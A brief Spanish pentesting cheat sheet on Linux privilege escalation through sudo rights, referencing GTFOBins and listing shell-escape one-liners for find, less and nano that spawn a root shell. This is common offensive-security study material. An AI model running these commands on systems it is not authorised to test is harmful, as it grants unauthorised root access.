Skip to content

Sudo

Si al realizar un

bash
sudo -l

Vemos que tenemos permiso de ejecutar varios binarios, una web la cual es muy util en estos casos de gftobins

{% embed url="https://gtfobins.github.io" %}

Explotación de binarios

find

shell
sudo find . -exec /bin/sh \; -quit

less

sudo less /etc/profile
!/bin/sh

nano

shell
sudo nano
^R^X
reset; sh 1>&0 2>&0